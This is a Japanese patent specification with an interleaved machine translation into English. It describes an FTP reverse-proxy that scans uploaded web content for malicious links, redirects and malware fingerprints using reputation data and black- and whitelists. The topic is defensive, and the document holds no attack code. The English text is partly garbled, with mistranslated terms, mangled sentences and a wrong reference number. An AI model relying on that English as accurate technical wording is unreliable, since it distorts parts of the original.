本発明のファイルのアップロード遮断システム及び方法は、1ユニットのアプライアンスサーバ(特定の用途向けに設計・開発されたサーバ)としてのFTPプロシキサーバ30に実装されており、図1乃至図3で示すように、FTPプロキシサーバ30は、FTPサーバ10とクライアント側のFTPクライアントコンピュータ20の間に設置し、中継時にGumblar(ガンブラー)などの不正サイトへの誘導(リンクやリダイレクト)を検出し、クライアント側のFTPクライアントコンピュータ20からFTPサーバ10にファイルを置く前にチェックし不正ファイルを除外する。 Upload isolation system and method of the file of the present invention is implemented in FTP Puroshiki server 30 as (servers that are designed and developed for a specific application) 1 unit appliance server, as shown in FIGS. 1 to 3 to, FTP proxy server 30 is installed between the FTP server 10 and the client side of the FTP client computer 20, and detecting the induction of the illegal sites such as Gumblar (Gumblar) when the relay (link or redirect), the client-side Check before putting the file from the FTP client computer 20 to the FTP server 10 to exclude unauthorized file.

なお、FTPプロキシサーバ30は、FTPのリバースProxyとして動作する。 Incidentally, FTP proxy server 30 operates as an FTP reverse Proxy. このため、FTPサーバ10の代わりに、クライアント側のFTPクライアントコンピュータ20からのFTP接続を受け付けるため、FTPサーバ10のIPアドレスを変更したり、FireWallなどでアドレス変換を行っておく。 Therefore, instead of the FTP server 10, for receiving an FTP connection from client FTP client computer 20, change the IP address of the FTP server 10, previously subjected to address conversion in such FireWall.
FTPプロキシサーバ30は、クライアント側のFTPクライアントコンピュータ20からのFTP接続を対象FTPサーバ(本例ではFTPサーバ10)の代わりに受け付けるため、通常は対象FTPサーバ(本例ではFTPサーバ10)の前段に設置する。 FTP proxy server 30 is to accept in place of (FTP server 10 in this example) client-side target FTP server FTP connection from the FTP client computer 20, the front stage of the normal target FTP server (FTP server 10 in this example) It is installed in. そして、通常は対象FTPサーバが設置されているネットワークに設置する。 Then, usually installed in a network which the target FTP server is installed.

このFTPプロシキサーバ30には、図4及び図5で示すように、CPU31と、このCPU31に内蔵し、或いは不図示の記憶装置(HDD,メモリ)に設けられたURL抽出手段としてのURL抽出エンジン32、判定手段としての判定エンジン33、電子指紋計算手段としての電子指紋計算エンジン34、マルウェア判定手段としてのマルウェア判定エンジン35と、URL格納手段としてのURL格納データベースDB1と、レピュテーション手段としてのレピュテーションデータベースDB2と、電子指紋蓄積手段としてのマルウェアの電子指紋データベースDB3と、ブラックリスト格納手段としてのブラックリストデータベースBLと、ホワイトリスト格納手段としてのホワイトリストデータベースWLと、を備えている。 The FTP Puroshiki server 30, as shown in FIGS. 4 and 5, a CPU 31, built in the CPU 31, or (not shown) of the storage device (HDD, memory) URL extraction engine as URL extracting means provided in 32, the determination engine 33 serving as a judging means, fingerprint calculation engine 34 as fingerprint calculating unit, malware decision engine 35 as malware determining means, the URL storage database DB1 as URL storage means, the reputation database as reputation means and DB2, includes a fingerprint database DB3 of malware as fingerprint storage means, and blacklist database BL as a black list storage unit, and white list database WL as white list storing means.

そして、CPU31は、不図示の入出力手段(I/Oインターフェースを含む)を介して入力側36と出力側37と接続されており、これら入力側36と出力側37からの情報等と、上記URL抽出エンジン32,判定エンジン33,電子指紋計算エンジン34,マルウェア判定エンジン35と、URL格納データベースDB1,レピュテーションデータベースDB2,マルウェアの電子指紋データベースDB3,ブラックリストデータベースBL,ホワイトリストデータベースWLと、を制御及び演算して、ファイルのアップロード遮断システム及び方法を制御しているものである。 Then, CPU 31 is connected to the output side 37 and the input side 36 via the input and output means (not shown) (including the I / O interface), and information such as from the output side 37 with these input side 36, the URL extraction engine 32, decision engine 33, the fingerprint calculation engine 34, a malware decision engine 35, URL storage database DB1, reputation database DB2, malware fingerprint database DB3, blacklist database BL, control, and white list database WL and calculates, in which controls the upload isolation system and method of the file.

URL格納データベースDB1は、図4及び図5で示すように、判定エンジン33を介してURL抽出エンジン32と接続されており、URL抽出エンジン32によって抽出されたURLを、判定エンジン33によって判定し、判定されたものを格納する。 URL storage database DB1, as shown in FIGS. 4 and 5, is connected to the URL extraction engine 32 via the decision engine 33, the URL extracted by the URL extracting engine 32, as determined by decision engine 33, storing those determined. つまり、判定エンジン33には、URL格納データベースDB1が接続され、このURL格納データベースDB1と前述したURL抽出エンジン32によって抽出されたURLとを対比するように構成されている。 In other words, the decision engine 33, URL storage database DB1 is connected and configured to comparing the URL extracted by the URL extracting engine 32 described above with the URL storage database DB1.

判定エンジン33は、URL抽出エンジン32によって抽出されたデータを受け取り判定するものであるが、レピュテーションデータベースDB2と、ホワイトリストデータベースWLと、ブラックリストデータベースBLを参照して、マルウェア等の有無を判定するものである。 Decision engine 33, but is intended to receive determined data extracted by the URL extracting engine 32 determines that the reputation database DB2, and white list database WL, with reference to the blacklist database BL, the presence of such malware it is intended.

レピュテーションデータベースDB2は、判定エンジン33で判定対象となったリンク先のサイト名もしくはIPアドレスに対する信頼度を示すレピュテーション値が格納されている。 Reputation database DB2, reputation value indicating the reliability to the site name or IP address of the link destination was the determination target at decision engine 33 is stored.

基本機能として、検出する場合に、ホワイトリストデータベースWL・ブラックリストデータベースBL以外に、レピュテーションデータベースDB2を用いた照合を行う。 As a basic function, in the case of detecting, in addition to the white list database WL · black list database BL, perform the verification using the reputation database DB2. 転送先が信用度の低いネットワークに存在する場合、不正なアップロードと判断する。 If the destination is present in the lower credit quality network, it is determined that the illegal upload.
本実施形態では、より具体的に説明すると、URLのFQDN部分をDNS解決して得られるIPアドレスに対して、レピュテーション検査を実施する。 In the present embodiment, will be described more specifically, the FQDN portion of the URL to the IP address obtained by DNS resolution, to implement the reputation inspection. レピュテーションデータベースDB2にアクセス(問い合わせを行なう)するときには、判定エンジン33は、IPアドレスに変換して、レピュテーション判定用常駐プログラムで行なう。 When accessing the reputation database DB2 (to query), the determination engine 33 converts the IP address is performed by the reputation determination resident program. 検査(判定)の結果は、閾値として、A. Results of the examination (determination) as a threshold value, A. 悪い評判は無い(known)、B. Bad reputation is no (known), B. 疑わしい評判(suspect)、C. Questionable reputation (suspect), C. 評判が悪い(poor)の3段階に分別される。 Reputation is classified into three levels of bad (poor). 標準設定では、レピュテーションによる判定結果のうち、poor(C)とsuspect(B)に該当したIPアドレスをNGとしている。 By default, among the determination result by the reputation, and the IP address corresponding poor (C) and the suspect (B) and NG. なお、NGの条件をpoor(C)だけにすることも可能である。 It is also possible to make the conditions of NG only poor (C). 本実施形態では、レピュテーションの閾値設定はFTPサーバ単位で行っており、レピュテーション検査の実施はFTPアカウント単位に設定している。 In this embodiment, the reputation threshold setting is performed in FTP server units, the implementation of reputation inspection is set to FTP account level. なお、DNS解決されない場合はレピュテーションの対象から除外され、NGと同じ扱いとしている。 Incidentally, if not DNS resolution is excluded from reputation, they are handled as NG.
上述のようにして、レピュテーションの結果が、OKとなったファイルはFTPサーバにアップロードし、NGとなったファイルは、FTPサーバにアップロードすることを保留して次ステップのホワイトリスト照合を行い、判定される。 As described above, the result of the reputation is, the file that is OK to upload to an FTP server, file became NG performs the white list collation of the next step are pending to be uploaded to the FTP server, judgment It is. なお、本システムではレピュテーションデータベースDB2を外部のレピュテーションDBサーバから定期的にレピュテーション情報を取得して最新のデータとし、これを基に判定している。 In the present system with the latest data periodically acquires reputation information reputation database DB2 from outside reputation DB server, it is determined based on this.

例えば、外部データベースであるCloudmark社のReputation データベースによりリンク先の信頼度を分析することが可能である。 For example, it is possible to analyze the linked confidence by Cloudmark Inc. Reputation database is an external database. このCloudmark社のReputation データベースは、本願出願時点で、世界で1億3,000万人が利用する最大規模のSNSサイトでも採用されているものであり、Cloudmark社のIPレピュテーションサービス「Cloudmark Sender Intelligence (以下 CSI)」を用いて、リンクURLの信頼度を分析する。 Reputation database of the Cloudmark, Inc., in the present time of filing, which has been adopted by the largest SNS site of the 130 million people in the world to use, Cloudmark, Inc. IP reputation service "Cloudmark Sender Intelligence of ( using the following CSI) ", to analyze the reliability of the link URL.

CSIは、全世界で10億人を超すCloudmarkユーザコミュニティからのトラフィック・パターン、フィンガープリント、フィードバック情報などによりリアルタイムで更新され、これらの相関を解析、レピュテーションスコアをリアルタイムに算出する。 CSI is traffic pattern from Cloudmark user community of over 1 billion people worldwide, fingerprints, and the like feedback information is updated in real time, calculates these correlation analysis, the reputation score in real time. 分析の結果、信頼度が低いと判断されたサイトへのリンクを含むコンテンツは、アップロードをブロックする。 Analysis revealed a content containing links to sites that reliability is determined to be low to block the upload.

ホワイトリストデータベースWLには、予め信頼できると判断されたURL,IPアドレス,FQDN,メールアドレスなどを登録するが、順次取得して信頼できると判断されたURL,IPアドレス,FQDN,メールアドレスなどを予め登録し、或いは追加して登録しておくものである。 The white list database WL, in advance reliable and the determined URL, IP address, FQDN, but to register such as e-mail address, it is determined that sequentially acquires and trusted URL, IP address, FQDN, such as e-mail address registered in advance, or is intended to be registered to add.
なお、本システムの開始時に、ホワイトリストデータベースWL(ホワイトリスト)の参照先定義は、顧客全体で同一に指定する。 It should be noted that, at the start of this system, referenced definition of white list database WL (white list), to specify the same on the entire customer. ホワイトリストデータベースWL(ホワイトリスト)の参照先は本システムの設定ファイルにて指定する。 Refer to the white list database WL (white list) is specified in the present system configuration files.
開始時ではなく、拡張時においてのホワイトリストデータベースWL(ホワイトリスト)の参照先定義は、機能追加時に行うもので、エンドユーザごとにホワイトリストデータベースWL(ホワイトリスト)を定義できる。 Rather than at the start, the referenced definition of white-list database WL of during expansion (white list) is for performing the time function addition, it defines the whitelist database WL (white list) for each end user. エンドユーザごとのホワイトリストデータベースWL(ホワイトリスト)は顧客側のLDAPサーバのアトリビュートで定義され、本システムはそれを参照する。 End whitelist database for each user WL (white list) is defined by the attributes of the LDAP server at a customer, the system will see it. アトリビュートは本システムの設定ファイルにて指定するように構成されている。 Attribute is configured to specify at the system configuration file.
より具体的には、上記設定に該当するURLの含まれたファイルは、FTPサーバ10にアップロードする。 More specifically, the file that contains the URL corresponding to the setting is uploaded to the FTP server 10. このとき、トップドメイン、FQDN等の半角英数字にて定義する。 At this time, the definition in the top domain, alphanumeric FQDN or the like. 本実施形態では、無効な設定、または未定義の場合は処理されないように構成されている。 In this embodiment, an invalid configuration, or undefined if is configured not processed. また、ホワイトリストデータベースWL(ホワイトリスト)はFTPクライアント単位で設定するようにしている。 In addition, white list database WL (white list) are to be set in the FTP client unit.

ブラックリストデータベースBLには、悪質なものと判断されたURL,IPアドレス,FQDNなどを登録するが、順次取得して悪質なものと判断されたURL,IPアドレス,FQDNなどを登録する。 The black list database BL, URL has been determined that the malicious, IP address, but to register such as FQDN, URL has been determined that the malicious sequentially acquisition, IP address, to register such as FQDN.
具体的には、上記設定に該当するURLの含まれたファイルはFTPサーバにアップロードしない。 Specifically, the file that contains the URL corresponding to the above setting is not uploaded to the FTP server. このとき、トップドメイン、FQDN等の半角英数字にて定義する。 At this time, the definition in the top domain, alphanumeric FQDN or the like. 本実施形態では無効な設定、または未定義の場合は処理されないように構成されている。 In this embodiment invalid setting, or undefined if one is configured so as not to be processed. またブラックリストデータベースBL(ブラックリスト)はFTPクライアント単位で設定するようにしている。 The black list database BL (black list) are to be set in the FTP client unit.

本発明で使用するホワイトリストデータベースWL及びブラックリストデータベースBLは、独自に構築するものであり、システム全体または対象FTPサーバごとに、同一のホワイトリストデータベースを使用し、システム全体または対象FTPサーバごとに、同一のブラックリストデータベースを使用する。 Whitelist database WL and black list database BL used in the present invention is to build their own, each entire system or target FTP server, using the same white list database, each entire system or target FTP server , to use the same black list database. また、判定エンジン33は、ホワイトリストデータベースWL及びブラックリストデータベースBLへは、URLとして問い合わせを行なう。 In addition, the decision engine 33, is to the white list database WL and black list database BL, conduct an inquiry as the URL.

本実施形態のシステムの基幹部分は、FTPサーバでファイルがアップロードされた時点で、コンテンツに含まれるリンク先に問題があるかどうかをチェックするものであるが、実際には既にアップロードされているコンテンツに含まれるリンク先に、後から改竄等の問題が発生することも考えられる。 Content backbone portion of the system of the present embodiment, at the time the file was uploaded by FTP server, but is intended to check whether there is a problem with the link destination included in the content, which in practice is already uploaded the link destination included in a problem of falsification later is also conceivable to occur.

そこで図8で示すように、「既にアップロードされたコンテンツ」について、そこに含まれるリンクの参照先に問題が発生していないかどうかを、常に更新され続けているレピュテーションデータベースDB2のレピュテーションデータを使用して定期的にチェックし、信用度がしきい値を下回るURLを発見し通知する仕組みを備えている。 Therefore, as shown in FIG. 8, for the "already uploaded content", using the reputation data of the reputation database DB2 that whether or not the link of a problem with the reference destination has not occurred, has always continued to be updated to be contained therein to regularly check, credit quality is provided with a mechanism for notification to discover the URL below the threshold. つまり、図8で示すように、外部データベースDBであるCloudmark社のReputation データベース、レピュテーションデータベースDB2を利用している。 That is, as shown in Figure 8 utilizes Cloudmark Inc. Reputation database is an external database DB, the reputation database DB2. この利用は、CPU31の制御のもとで入力側36からインターネット60を介して接続されるように構成されている。 This use is configured to be connected from the input side 36 under the control of the CPU31 via the Internet 60.

また、本実施形態では、電子指紋計算手段としての電子指紋計算エンジン34によって、電子指紋を取得するが、電子指紋計算は、ハッシュ値を取得して行なう。 Further, in the present embodiment, the fingerprint calculation engine 34 as fingerprint calculating unit, but acquires a fingerprint, the fingerprint calculation is performed by obtaining a hash value.
ハッシュ値とは、任意の長さのデータを固定長のデータに投影するハッシュ関数を用いて計算される固定長のデータを指すものである。 Hash value is intended to refer to a fixed-length data calculated using a hash function for projecting an arbitrary length of data into fixed-length data. ハッシュ関数の種類によって、得られるハッシュ値のデータ長は異なる。 The type of hash function, the data length of the resulting hash value is different.

本例では、160bitのハッシュ値が得られるSHA1と称するハッシュ関数を用いている。 In this example, using a hash function called SHA1 hash value of 160bit is obtained. ハッシュ関数としては、上記SHA1の他に、MD5(128bit)、RIPEMD(160bit)、SHA256(256bit)、SHA512(512bit)などがあるが、本例ではSHA1を用いている。 The hash function, in addition to the above SHA1, MD5 (128bit), RIPEMD (160bit), SHA256 (256bit), there are such SHA512 (512 bits), in this example uses the SHA1. ファイル各部の特徴を捉える多値複合型の電子指紋も用いることができる。 Fingerprint multilevel complex type that captures the features of files each part may also be used.
ハッシュ関数を使った場合、データの内容が1バイトでも異なると、全く別のハッシュ値が生成される。 When using the hash function, the contents of the data are different even in one byte, it is completely generated different hash value. このため、ハッシュ値が同一であれば同一のデータであることが判明し、ハッシュ値が異なれば別の内容であると判定することができる。 Therefore, proved hash values ​​are the same data if they are identical, it can be determined that the different content Different hash values.

次に、本実施形態において、図6に示す通信フローを示す関係図に基づいて説明する。 Then, in the present embodiment will be described based on the relationship diagram illustrating the communication flow shown in FIG. 図6では、認証の場合、転送OKの場合、転送NGの場合についての通信フローである。 In Figure 6, when the authentication, if the transfer OK, a communication flow for the case of the transfer NG.
○認証:FTPプロキシサーバ30がFTPクライアント20から認証手続きを受け付けると、FTPアカウントIDの問い合わせをデータベースサーバに行なう。 ○ Authentication: When the FTP proxy server 30 accepts the authentication procedure from the FTP client 20, makes an inquiry of the FTP account ID to the database server. そして、FTPプロキシサーバ30は、FTPアカウントIDのサービス要件回答を得ると、FTPサーバ10に認証手続きを行なう。 Then, FTP proxy server 30 obtains a service requirement answers FTP account ID, performs an authentication procedure to the FTP server 10. FTPサーバ10は認証の許可或いは失敗について、FTPプロキシサーバ30に返し、FTPプロキシサーバ30は、FTPクライアント20に、FTPサーバ10からの認証の許可或いは失敗について、通知する。 For FTP server 10 is permitted or failure of the authentication, returns to the FTP proxy server 30, FTP proxy server 30, the FTP client 20, permit or for the failure of the authentication from the FTP server 10, to notify.
○転送OK:FTPクライアント20からファイルアップロードをFTPサーバ10に行なう場合、先ずはFTPプロキシサーバ30でファイルを受け取り、ファイル検査を行なう。 ○ Transfer OK: When performing the FTP client 20 files uploaded to the FTP server 10, first receives a file with FTP proxy server 30 performs file inspection. そして、不正リンクやマルウェア等の未検出時には、FTPサーバ20にファイルアップロードを行なう。 Then, when undetected, such as unauthorized links or malware, perform file upload to an FTP server 20. FTPサーバ10でアップロードが完了した場合、その旨の通知がFTPプロキシサーバ30に返され、FTPプロキシサーバ30ではFTPクライアント20に、アップロード完了の通知を行なう。 If the upload is completed on the FTP server 10, notification to that effect is returned to the FTP proxy server 30, the FTP proxy server 30 in the FTP client 20, and notifies the upload completion.
○転送NG:FTPプロキシサーバ30でファイルを受け取り、ファイル検査を行なう。 ○ Transfer NG: receive files with FTP proxy server 30 performs file inspection. 不正リンクやマルウェア等を検出したときには、FTPプロキシサーバ30はSMTPサーバを介して、システム管理者用コンピュータ40にメールを送付し、同時にSMTPサーバを介して、FTPクライアント20にメールを送付する。 When it detects unauthorized links or malware, etc., FTP proxy server 30 via the SMTP server, send an email to the system administrator for the computer 40, at the same time via the SMTP server, and sends the mail to the FTP client 20.
このように、検出結果メールは、出力側37からシステム管理者(システム管理者用コンピュータ40)及びFTPクライアント20に送付するように構成している。 Thus, the detection result mail is configured to send the output side 37 System Administrator (System administrator computer 40) and the FTP client 20. 特に本実施形態では、FTPクライアント20に送付しているが、この場合には、LDAPを用い顧客管理システムと連携、アカウントに対応するメールアドレスを取得し、エンドユーザであるFTPクライアント(ユーザ端末)20に検出結果メールを送付するようにしている。 Particularly in this embodiment has been sent to the FTP client 20, in this case, works with the customer management system using LDAP, obtains the mail address corresponding to the account, FTP client is an end user (user terminal) so that sending the detection result mail to 20.

本実施形態では、ログ出力について、リバースFTP Proxyのログをsyslogプロトコルにより出力側37から外部に送出可能としている。 In this embodiment, the log output, thereby enabling sending reverse FTP Proxy log to the outside from the output side 37 by syslog protocol. つまり、FTPの中継やチェック、アップロードの除外に関するログ(動作ログ)をsyslog形式で外部のサーバに送付できる。 That is, it is possible to send FTP of the relay and check the log (action log) on ​​the exclusion of the upload to the outside of the server in the syslog format.

次に、本発明のシステム及び方法において、システム連携について、簡単に説明する。 Next, the system and method of the present invention, the system linkage is briefly described.
顧客システムとの連携は、開始時において、顧客側のLDAPサーバと連携することができる。 Cooperation with the customer system, at the start, it is possible to work with customer LDAP server. 当初の連携項目はエンドユーザへのメール通知を行うためのメールアドレスの取得である。 Initial collaboration item is the acquisition of the e-mail address in order to carry out the e-mail notification to the end user.

また顧客システムとの連携は、開始後の機能追加時において、顧客側のLDAPサーバとの連携項目に、次の項目を追加することが可能である。 The cooperation with the customer system, at the time of adding functions after the start, the linkage items with customer LDAP server, it is possible to add the following items.
・エンドユーザごとのホワイトリスト ・エンドユーザごとの接続可能なIPアドレス ・エンドユーザごとのアップロード可能なファイル種別 ・エンドユーザごとのJavaScriptのアップロード可否 · JavaScript upload whether or not each of you can upload the file type, the end user of each can be connected IP address end-user for each white list the end user of each end-user

さらに、顧客システムとの連携は、開始後の機能追加時において、LDAP以外への連携としては、Oracle(登録商標)、PostgreSQL(登録商標)、MySQL(登録商標)などが可能である。 In addition, cooperation with the customer system, at the time of additional functions after the start, as the cooperation to non-LDAP, Oracle (registered trademark), PostgreSQL (registered trademark), MySQL (registered trademark) and the like are possible.

次に、マルウェア(Malware:不正かつ有害な動作を行う意図で作成された悪意のあるソフトウェアや悪質なコードの総称)検知の無い場合と検知した場合について、図9と図10で示すフローチャートを用いて説明する。 Next, malware: the case of detecting the case where there is no (Malware fraud and term for malicious software and malicious code created with the intention of performing a harmful operation) detecting, using the flow chart shown in FIGS. 9 and 10 It described Te.

コンテンツの検査は、FTPプロトコルによりコンテンツや設定ファイル(.htaccessなど)がアップロードされるときに不正コンテンツか判断する。 Inspection of the content, it is determined whether the illegal content when the content and configuration files (such as .htaccess) is uploaded by FTP protocol. 不正コンテンツと判定したときにはコンテンツのアップロードを行わず、クライアント側にはエラーメッセージを返す。 Without the upload of content when it is determined that the illegal content, returns an error message to the client side. なお、コンテンツ検査のタイミングは、開始時以降、リアルタイム(FTPプロトコルによりコンテンツがアップロードされるときに調査する)である。 The timing of content inspection, since the start, a real time (to investigate when content is uploaded by FTP protocol).

本実施形態において、チェック対象からの除外する場合について述べる。 In the present embodiment, it will be described to exclude from the check target. 開始時において、エンドユーザごとにアップロード時のチェックを行うか否か、定義することも可能である。 At the start, whether to check during upload for each end user, it is also possible to define. エンドユーザごとのチェックの可否は顧客側のLDAPサーバのアトリビュートで定義され、ICDはそれを参照する。 Check the propriety of each end-user is defined by the attributes of LDAP server of the customer side, ICD refers to it. アトリビュートはICDの設定ファイルにて指定する。 Attribute is specified in the configuration file of the ICD.

(結果通知)本実施形態では、不正ファイルと判定しアップロードの中止を行った場合、結果をメールにて顧客側の管理者とエンドユーザに通知する。 In the (result notification) In the present embodiment, in the case of performing the discontinuation of the upload it is determined that illegal file, the result to notify the customer side of the administrators and end users by e-mail. つまり、図6及び図7で示すように、SMTPサーバからFTPクライアントへメールで通知することができる(図6の転送NGを参照)。 That is, as shown in FIGS. 6 and 7, can be notified by e-mail from the SMTP server to the FTP client (see Transfer NG in Fig. 6). なお顧客側の管理者のメールアドレスは独自に定義する。 The administrator's e-mail address of the customer side is to define your own.
エンドユーザへの通知は、FTP IDに対応するエンドユーザのメールアドレスが顧客側システムから取得可能な場合、対応できる(システム連携はLDAPを想定)。 Notification to the end user, if the mail address of the end user corresponding to the FTP ID is obtainable from the customer system, can cope (system collaboration assumed LDAP).

(不正コンテンツ発見後の動作) (Operation after illegal content discovery)
本実施形態では、不正ファイルと判定しアップロードの中止を行った場合、FTP接続を中断する。 In this embodiment, if you make the discontinuation of the upload it is determined that illegal file, interrupt the FTP connection. その後のFTP接続を一定期間許可しないことも可能である。 It is also possible that no subsequent FTP connection to allow a certain period of time.

(チェック対象からの除外) (Excluded from the check target)
本実施形態では、FTP IDごとのチェック実行/除外に関する定義を顧客側システムから取得可能な場合、アップロード時の検査から除外できる(システム連携はLDAPを想定)。 In the present embodiment, if available definitions for check execution / exclusion of each FTP ID from the customer side system, can be excluded from the inspection of the upload (assuming the system collaboration LDAP).

(FTP接続元のIPアドレスの制限) (Restriction of the FTP connection source IP address)
本実施形態では、 FTP IDごとに、FTP接続に関するIPアドレスによるアクセスリストを顧客側システムから取得可能な場合、本システムのアクセスリストとして使用することが可能である(システム連携はLDAPを想定)。 In this embodiment, each FTP ID, if available access list by IP address for FTP connection from the customer side system, it is possible to use as the access list of the system (system cooperation assumed LDAP).

マルウェア等の検出としては、例として、以下のような検出が可能である。 The detection of such malware, as an example, it is possible to detect the following.
(不正なURL転送の検出の場合) (In the case of the detection of the illegal URL forwarding)
想定しないURLに転送(リンク)されているか検査する。 It is transferred to not assume URL (link) is or inspection.
ホワイトリストデータベース・ブラックリストデータベースと照合し、本来のファイルには存在しないはずのリンクを検知し、FTPでのアップロードから除外する。 Against the white list database black list database, it detects a link that should not exist in the original file, exclude from the upload in the FTP. アップロードから除外した場合、メールで通知する。 If you were excluded from the upload, it is notified by e-mail.
なお、JavaScriptを用いて難読化やスクリプト内でURLを生成している場合も検知できる。 Incidentally, it can be detected even if that is generating the URL in obfuscation and the script using JavaScript.

(不正なリダイレクトの検出の場合) (In the case of detection of illegal redirect)
想定しないURLにリダイレクトされているか検査する。 It will be redirected to not assume URL is either inspection.
ホワイトリスト・ブラックリストと照合し、本来のファイルには存在しないはずのリダイレクトを検知し、FTPでのアップロードから除外する。 Against the white list, black list, to detect the redirect that should not exist in the original file, exclude from the upload in the FTP. アップロードから除外した場合、メールで通知する。 If you were excluded from the upload, it is notified by e-mail.

図9は、マルウェア検知の無い場合を示すもので、ステップS1で「login Auth」(認証付きメールに使うプロトコル)かどうか判定する。 Figure 9 determines, shows the case where there is no malware detection, whether "login Auth" in step S1 (the protocol used for authentication with the mail). ここでは、FTPプロトコルにおけるユーザー認証(アカウント/パスワード)を行う。 Here, a user authentication in FTP protocol (account / password). ここでPassする(ステップS1:Pass)と、ステップ2でファイルを受信する。 Now to Pass (Step S1: Pass) and, receiving the file in step 2. ここでは、FTPプロトコルにおけるファイルの受信(設置ディレクトリのPathを含む)を行なう。 Here, a reception file in the FTP protocol (including Path installation directory).

ステップS2でファイル受信した後で、ステップS3でファイルの種別(バイナリ形式かテキスト形式)を判断する。 In step S2 after the file received, it determines the type of file (binary or text format) in step S3. バイナリ形式である場合(ステップS3:バイナリ形式)には、ステップS16の処理、すなわち正規FTPサーバファイルへファイル転送を行なう。 If a binary format: The (step S3 binary format), the processing in step S16, i.e., transfer files to legitimate FTP server files. ここでは、可読でない場合は、チェックをパスしてWWWサーバにアップロードさせる。 Here, if it is not readable is, to be uploaded to the WWW server to pass the check.
一方、テキスト形式である場合(ステップS3:テキスト形式)には、ステップS4でJavaScriptの有無を判断する。 On the other hand, if it is text: To (Step S3 text format), it is determined whether the JavaScript at step S4.
JavaScriptが無い場合(ステップS4:No)、ステップS7の処理を行なう。 If JavaScript is not (step S4: No), it performs the process of step S7.

一方、JavaScriptが有る場合(ステップS4:Yes)、ステップS5でJavaScriptの構文解析を行なう。 On the other hand, if the JavaScript there (step S4: Yes), performs parsing JavaScript in step S5. ここでは、JavaScriptを使ってJavaScriptのスクリプトを難読化してあるのを復号する動作を行なう。 Here, it operates to decode the are to obfuscate the JavaScript script using JavaScript. ステップS5でJavaScriptの構文解析を行なった後で、JavaScriptのURLの抽出を行なう(ステップS6)。 In step S5 after performing parsing JavaScript, to extract the JavaScript the URL (step S6). ここでは、JavaScript内部にあるリンクを抽出する。 Here, it extracts the links on the inside JavaScript.
ステップS4でJavaScriptが無い場合(ステップS4:No)、及びステップS6でJavaScriptのURLの抽出を行なった後で、JavaScript以外の部分でURLの抽出を行なう(ステップS7)。 If JavaScript is not at In step S4 (step S4: No), and after making the extraction of JavaScript URL in step S6, to extract the URL in a portion other than the JavaScript (step S7). ここでは、JavaScript以外の部分にあるリンクを抽出する。 Here, it extracts the links at the portions other than JavaScript. 上記ステップS1〜S7の処理の後で、URLの偽装を解いて正規化を行なう(ステップS8)。 After the processing of step S1 to S7, the normalization by solving the impersonation URL (step S8). ここでは、URLエンコード(エスケープ)、数値実体参照等の復号を行なう。 Here, URL encoding (escape), performs decoding of the numerical entity references, and the like.

このようにして、URLの正規化が行なわれた後で、ページ名と内包URLをURL格納データベースDB1に格納する(ステップS9)。 In this way, after the normalization of the URL is performed, and stores the page name and included URL in the URL storage database DB1 (Step S9). 次にIPアドレスを取得する(ステップS10)。 Then obtains the IP address (step S10).
次に、レピュテーションデータベースDB2からレピュテーション値を取得する(ステップS11)。 Next, to obtain the reputation value from reputation database DB2 (step S11). つまり、抽出されたIPアドレスについてレピュテーション値を取得する。 In other words, to obtain the reputation value for the extracted IP address.

ステップS1〜ステップS11の処理の後、ステップS12で、ブラックリストデータベースBLに格納されたブラックリストの符号と照合する。 After step S1~ step S11, in step S12, matching the sign of stored in the blacklist database BL blacklist. そして、ブラックリストの照合の結果、符号がある場合にはステップS15でFTPエラーを応答し、終了する。 As a result of the collation blacklist, if there is a sign responds to FTP error in step S15, and ends.

一方、ブラックリストデータベースBLに格納されたブラックリストの符号と照合し、符号が無い場合(ステップS12:No)、ステップS13で、ステップS11でレピュテーションデータベースDB2から取得したレピュテーション値が、閾値を下回るURLが存在するかどうか判断する。 On the other hand, against the sign of the black list stored in the blacklist database BL, if the sign is not (step S12: No), in step S13, the reputation value obtained from reputation database DB2 in step S11 is below a threshold URL but to determine whether or not the present.
レピュテーション値が、閾値を下回るURLが存在しない場合(ステップS13:No)、ステップS16で正規FTPサーバファイルへファイルを転送する。 Reputation value, if there is no URL below the threshold (step S13: No), transferring files in step S16 to legitimate FTP server files. レピュテーション値が、閾値を下回るURLが存在する場合(ステップS13:Yes)、ステップS14で、ホワイトリストデータベースWLのホワイトリストの符号と照合する。 Reputation value, if the URL below a threshold exists (step S13: Yes), in step S14, matching the sign of whitelist whitelist database WL.

このとき、ホワイトリストを用いた不正コンテンツの判定は、ホワイトリストを定義し、アップロード対象(コンテンツ・設定ファイル)にホワイトリストに存在しないURLへの誘導が存在する場合、不正コンテンツと判定する。 In this case, the determination of illegal content using the white list, to define the white list, if the induction to a URL that does not exist in the white list to be uploaded (content and setting file) exists, it is determined that the illegal content.

ホワイトリストデータベースWLのホワイトリストの符号が有る場合(ステップS14:Yes)、ステップS16で正規FTPサーバファイルへファイルを転送する。 If the sign of the whitelist whitelist database WL is present (step S14: Yes), transferring files in step S16 to legitimate FTP server files. 一方、ホワイトリストデータベースWLのホワイトリストの符号が無い場合(ステップS14:No)、ステップS15でFTPエラーを応答し、終了する。 On the other hand, when the sign of the whitelist whitelist database WL is not (Step S14: No), the FTP error response in step S15, and ends.

ステップS16で正規FTPサーバファイルへファイルを転送した後で、ステップS17でページ名と内包URLをURL格納データベースDB1に格納して、終了する。 In step S16 the normal FTP server file after transmitting the file, and stores the page name and included URL in the URL storage database DB1 at step S17, and ends.

次に、マルウェア等を検出した場合について、図10で示すフローチャートを用いて説明する。 Next, when detecting malware, etc., it will be described with reference to a flowchart shown in FIG. 10. 図10で示すフローチャートと図9で示すフローチャートにおける各ステップにおいて、同一記号及び符号のステップは同一処理を示すものであり、図9の説明と重複するので、その説明を省略し、図10のフローチャートでは、図9で説明していない処理(ステップ)を中心に説明する。 At each step in the flowchart shown in the flowchart and 9 shown in FIG. 10, the same symbols and numerals step is intended to indicate the same process, so overlaps with the description of FIG. 9, the description is omitted, the flow chart of FIG. 10 in will be mainly described processing (steps) that are not described in FIG. つまり、ステップS1〜ステップS8、ステップS10〜ステップS17まではマルウェア等を検出しない図9のフローチャート処理と同様であり、マルウェア等を検出しない場合のようなステップS9で、ページ名と内包URLをURL格納データベースDB1に格納は、しない。 That is, step S1~ step S8, the up step S10~ step S17 is similar to the flowchart process of FIG. 9 does not detect malware, etc., in step S9, as in the case of not detecting malware, etc., the page name and inclusion URL URL stored in the storage database DB1 does not.

